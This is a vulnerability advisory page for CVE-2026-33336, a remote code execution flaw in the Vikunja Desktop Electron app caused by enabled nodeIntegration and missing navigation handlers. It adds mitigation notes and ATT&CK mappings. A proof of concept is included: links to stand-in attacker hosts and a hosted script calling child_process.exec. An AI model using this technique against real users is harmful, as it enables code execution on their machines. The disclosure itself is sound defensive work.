CVE-2026-33336
Published: 24 March 2026
Description
Vikunja is an open-source self-hosted task management platform. Starting in version 0.21.0 and prior to version 2.2.0, the Vikunja Desktop Electron wrapper enables `nodeIntegration` in the main BrowserWindow and does not restrict same-window navigations. An attacker who can place a…
more
link in user-generated content (task descriptions, comments, project descriptions) can cause the BrowserWindow to navigate to an attacker-controlled origin, where JavaScript executes with full Node.js access, resulting in arbitrary code execution on the victim's machine. Version 2.2.0 patches the issue. ## Root cause Two misconfigurations combine to create this vulnerability: 1. **`nodeIntegration: true`** is set in `BrowserWindow` web preferences (`desktop/main.js:14-16`), giving any page loaded in the renderer full access to Node.js APIs (`require`, `child_process`, `fs`, etc.). 2. **No `will-navigate` or `will-redirect` handler** is registered on the `webContents`. The existing `setWindowOpenHandler` (`desktop/main.js:19-23`) only intercepts `window.open()` calls (new-window requests). It does **not** intercept same-window navigations triggered by: - `<a href="https://...">` links (without `target="_blank"`) - `window.location` assignments - HTTP redirects - `<meta http-equiv="refresh">` tags ## Attack scenario 1. The attacker is a normal user on the same Vikunja instance (e.g., a member of a shared project). 2. The attacker creates or edits a project description or task description containing a standard HTML link, e.g.: `<a href="https://evil.example/exploit">Click here for the updated design spec</a>` 3. The Vikunja frontend renders this link. DOMPurify sanitization correctly allows it -- it is a legitimate anchor tag, not a script injection. Render path example: `frontend/src/views/project/ProjectInfo.vue` uses `v-html` with DOMPurify-sanitized output. 4. The victim uses Vikunja Desktop and clicks the link. 5. Because no `will-navigate` handler exists, the BrowserWindow navigates to `https://evil.example/exploit` in the same renderer process. 6. The attacker's page now executes in a context with `nodeIntegration: true` and runs: `require('child_process').exec('id > /tmp/pwned');` 7. Arbitrary commands execute as the victim's OS user. ## Impact Full remote code execution on the victim's desktop. The attacker can read/write arbitrary files, execute arbitrary commands, install malware or backdoors, and exfiltrate credentials and sensitive data. No XSS vulnerability is required -- a normal, sanitizer-approved hyperlink is sufficient. ## Proof of concept 1. Set up a Vikunja instance with two users sharing a project. 2. As the attacker user, edit a project description to include: `<a href="https://attacker.example/poc.html">Meeting notes</a>` 3. Host poc.html with: `<script>require('child_process').exec('calc.exe')</script>` 4. As the victim, open the project in Vikunja Desktop and click the link. 5. calc.exe (or any other command) executes on the victim's machine. ## Credits This vulnerability was found using [GitHub Security Lab Taskflows](https://github.com/GitHubSecurityLab/seclab-taskflows).
Mitigating Controls (NIST 800-53 r5)AI
Flaw remediation directly mitigates the CVE by patching the Electron wrapper to version 2.2.0, which fixes nodeIntegration and adds navigation handlers.
Configuration settings enforce secure BrowserWindow webPreferences, disabling nodeIntegration and implementing will-navigate handlers to block unauthorized external navigations.
Separation of system and user functionality prevents renderer processes loading untrusted web content from accessing Node.js APIs, directly countering the RCE vector.
Security SummaryAI
CVE-2026-33336 affects the Vikunja Desktop Electron wrapper, an open-source self-hosted task management platform, in versions starting from 0.21.0 and prior to 2.2.0. The vulnerability stems from two misconfigurations in the Electron BrowserWindow: `nodeIntegration` enabled in web preferences, granting loaded pages full access to Node.js APIs such as `require`, `child_process`, and `fs`; and the absence of `will-navigate` or `will-redirect` handlers, allowing unrestricted same-window navigations triggered by HTML links, `window.location` assignments, HTTP redirects, or `<meta http-equiv="refresh">` tags.
An attacker who is a normal user on the same Vikunja instance, such as a member of a shared project, can exploit this by embedding a standard HTML link—e.g., `<a href="https://evil.example/exploit">Click here</a>`—in user-generated content like task descriptions, comments, or project descriptions. DOMPurify sanitization permits these legitimate anchor tags. When a victim using Vikunja Desktop clicks the link, the BrowserWindow navigates to the attacker's origin in the same renderer process. The attacker's JavaScript then executes with Node.js privileges, enabling arbitrary code execution on the victim's machine as their OS user, including file read/write, command execution, malware installation, and data exfiltration.
Version 2.2.0 patches the issue by addressing these Electron misconfigurations. The GitHub Security Advisory (GHSA-83w9-9jf6-88vf) and Vikunja changelog for v2.2.0 detail the fix, with the vulnerability carrying a CVSS v3.1 score of 8.8 (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H) and mapped to CWE-94. It was discovered via GitHub Security Lab Taskflows.
Details
- CWE(s)
Affected Products
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
Vulnerability in Electron app enables drive-by compromise (T1189) and exploitation for client execution (T1203) via malicious link (T1204.001) embedded in user content, allowing attacker-controlled JS to gain Node.js privileges for RCE upon navigation.